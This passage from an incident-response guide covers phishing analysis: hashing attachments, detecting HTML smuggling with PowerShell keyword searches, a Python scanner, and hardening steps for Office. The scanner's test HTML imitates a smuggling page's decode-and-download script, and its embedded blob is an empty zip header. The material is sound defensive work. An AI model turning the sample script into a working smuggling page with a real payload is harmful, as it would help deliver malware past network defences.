7.4 Extracting attachment hashes
```powershell
$files = Get-ChildItem "C:\IR\attachments\*" -File
foreach ($f in $files) {
    $md5    = (Get-FileHash $f.FullName -Algorithm MD5).Hash
    $sha256 = (Get-FileHash $f.FullName -Algorithm SHA256).Hash
    Write-Host "$($f.Name)"
    Write-Host "  MD5:    $md5"
    Write-Host "  SHA256: $sha256"
    # Look the hash up rather than uploading the file, in case the attachment contains internal data
    Write-Host "  VT URL: https://www.virustotal.com/gui/file/$sha256"
    Write-Host ""
}
```
8. HTML Smuggling Detection
8.1 How it works
- The attacker embeds the payload in an HTML file as Base64
- When the user opens the HTML in a browser, JavaScript decodes it client-side and triggers a download automatically
- This evades network-layer detection (only an HTML file crosses the wire)
- Common in Nobelium/APT29, QakBot and other advanced campaigns
8.2 Detection method
```powershell
# HTML files downloaded in the last 7 days that contain the client-side decode/download primitives
$pattern = 'atob|Uint8Array|Blob|createObjectURL|application/octet-stream|saveAs'
Get-ChildItem "C:\Users\*\Downloads\*.html","C:\Users\*\Downloads\*.htm" -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } |
    ForEach-Object {
        $content = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue
        if (-not $content) { return }
        # -match keeps only the first hit in $Matches; enumerate every distinct hit instead
        $hits = [regex]::Matches($content, $pattern) | ForEach-Object { $_.Value } | Sort-Object -Unique
        if ($hits) {
            [PSCustomObject]@{
                File               = $_.FullName
                LastWriteTime      = $_.LastWriteTime
                SuspiciousPatterns = ($hits -join ', ')
                Size               = $_.Length
            }
        }
    }
```
Browser history will show access to a local file (file:// protocol) immediately followed by a file download.
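As an added Python example (not from the original chapter), an offline scanner for collected HTML files that goes one step beyond the keyword match in 8.2: it lists which decode/download primitives are present, locates long Base64 literals, and decodes their first bytes to identify what file type is being smuggled. The HTML fixture is constructed and its Base64 blob is a zip local-file header followed by zero bytes, not a payload:

```python
import re
import base64

TOKENS = ["atob", "Uint8Array", "Blob", "createObjectURL", "application/octet-stream",
          "saveAs", "msSaveOrOpenBlob", ".download"]
B64_RE = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")   # quoted Base64 literal of 64+ chars
MAGIC = [(b"PK\x03\x04", "zip"), (b"MZ", "pe"), (b"\xd0\xcf\x11\xe0", "ole (doc/xls)"), (b"%PDF", "pdf")]

# Constructed fixture: a zip local-file header ("UEsDBBQA" decodes to PK\x03\x04\x14\x00) padded with zeros
FIXTURE_BLOB = "UEsDBBQA" + "A" * 56
SAMPLE_HTML = """<html><body><p>Your document is loading...</p>
<script>
var payload = "__BLOB__";
var bytes = Uint8Array.from(atob(payload), function (c) { return c.charCodeAt(0); });
var blob = new Blob([bytes], {type: "application/octet-stream"});
</script></body></html>""".replace("__BLOB__", FIXTURE_BLOB)

def file_type(data):
    """Identify the decoded blob by its magic bytes."""
    return next((name for sig, name in MAGIC if data.startswith(sig)), "unknown")

def scan_html(text):
    """Return the smuggling primitives found, the embedded blobs with their detected type, and a verdict."""
    tokens = [t for t in TOKENS if t in text]
    blobs = []
    for literal in B64_RE.findall(text):
        try:
            data = base64.b64decode(literal, validate=True)
        except ValueError:
            continue                                   # long string that is not Base64 (e.g. a hash or key)
        blobs.append({"b64_len": len(literal), "bytes": len(data), "type": file_type(data)})
    if tokens and blobs:
        verdict = "likely HTML smuggling"              # decoding primitives plus an embedded file
    elif tokens or blobs:
        verdict = "review"
    else:
        verdict = "clean"
    return {"tokens": tokens, "blobs": blobs, "verdict": verdict}

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
```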
9. Hands-on Analysis Workflow: Phishing Email IR SOP
Step 1: Confirm the phishing email
- Obtain the original message (.eml/.msg) and analyze the headers
- Check the SPF/DKIM/DMARC results
- Extract the attachment or URL
- Record: sender, recipient list, send time, subject
Step 2: Attachment/URL analysis
- Compute file hashes and query VT / MalwareBazaar
- Detonate in a sandbox (ANY.RUN, Hybrid Analysis)
- Look up URLs (urlscan.io, VirusTotal URL scan)
- Analyze macro content with olevba
Step 3: Triage affected hosts
- Confirm which users opened the attachment (Prefetch, Amcache, RecentDocs)
- Check MotW/Zone.Identifier to confirm the file's origin
- Analyze the process chain (Sysmon/4688) to confirm whether malicious code executed
- Check PowerShell 4104 logs for follow-on activity
Step 4: Determine the scope of impact
- Search for messages from the same sender to other users
- Check for signs of lateral movement → 15 Lateral Movement Detection
- Check for C2 communication (network logs, DNS logs)
Step 5: Containment and eradication
- Isolate affected hosts
- Block the sender/domain/attachment hash at the mail gateway
- Recall delivered messages (Exchange: Search-Mailbox -DeleteContent)
- Remove malicious files and persistence mechanisms
- Reset passwords of affected accounts
Step 6: Hardening
- Block Office macros (GPO: Block macros in Office files from the Internet)
- Enable ASR (Attack Surface Reduction) rules:
```powershell
# Block all Office applications from creating child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
# Block Office applications from creating executable content
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled
# Block Office applications from injecting code into other processes
Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Enabled
```
- Deploy an email sandbox (e.g. Microsoft Defender for Office 365 Safe Attachments)
- Security awareness training for staff